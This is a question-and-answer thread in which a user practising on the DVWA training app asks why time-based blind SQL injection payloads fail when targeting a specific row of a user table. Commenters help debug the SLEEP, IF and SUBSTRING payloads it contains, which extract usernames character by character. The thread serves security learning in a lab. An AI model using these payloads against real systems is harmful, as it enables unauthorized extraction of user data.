# time based sql injection with row

Tags: mysql, sql, sql-injection, code-injection

I have installed `dvwa` for trying time-based SQL injection on `MySQL 5.4.x`

I first did the following (which worked):

```
p=1;SELECT if((SELECT database())="databasename", SLEEP(10), NULL)
```

Afterwards, I tried:

```
p=1;SELECT if((SELECT substring(username,1,1) FROM user)='a', SLEEP(10), NULL)
```

Which also worked

`USER` is the table name and username the column

But when I try to do it with the second username it doesn't work

imagine the first username is `admin` and the second `abraham`.

I did:

```
p=0;SELECT if((SELECT substring(username,1,1) FROM user where ROWNUM=2)='a', SLEEP(10), NULL)
```

But this doesn't work, and I don't know why.

```
p=0;SELECT if((SELECT substring(username,1,1) FROM user limit 1,1)='a', SLEEP(10), NULL)
```

Also doesn't work

```
p=0;SELECT if((SELECT substring(username,1,1) FROM user ORDER BY username limit 1,1)='a', SLEEP(10), NULL)
```

Also doesn't work

So my question is: how can I select the row, and why did my previous attempts with `LIMIT` and `ROWNUM` not work?

Comment: "*Doesn't work" doesn't tell us anything, what actually happened? (and what did you expect to happen?)

Comment: by saying "doesn't work" i mean that the function sleep(10) wasn't executed, so it doesn't sleep 10second) theorically it have to sleep 10second because the condition is true. But maybe i'm wrong or my sql request is wrong

Comment: I thought mysql doesn't have ROWNUM, maybe this is why your first query doesn't work? Besides that, how many rows do you have in table? Only 'admin' and 'abraham' ? If there are other rows, second query may fail because rows may be returned in arbitrary order. And last query may fail because you are missing order column number or name.

Comment: according what u say is true, rownum works only on ORACLE server. there are more than 2 rows : there are 7 So if I want to change the second for making it working, how i change it ? according to the third i just missed it on my post i'll change it

Comment: So does third works? or it still fails even with ordering by username? Could there be usernames starting with numbers, or anything that comes before 'a'?

Comment: No the third doesn't work :/ there are no username that begin with number, the second is Abraham. Are they other function that could work ?

Comment: Abraham with uppercase 'A' ? Does user table have id? You can try to select second row directly by id, and see if it works. Another thing to try is use limit 1 instead of limit 1,1

Comment: no it's not uppercase, but it doesn't matter as i don't use ASCII. with limit 1 it doesn't work also. Btw there are id but it's format is like xxxxxxxx where x is number and it's random. So i don't think i could use it

Comment: Does limit 0,1 work? You could select row by this random id (which you can directly take from database, since this is a training environment. you do have direct access to db, right?) to test if second row satisfies your condition of (...)='a'

Comment: no it doesn't work also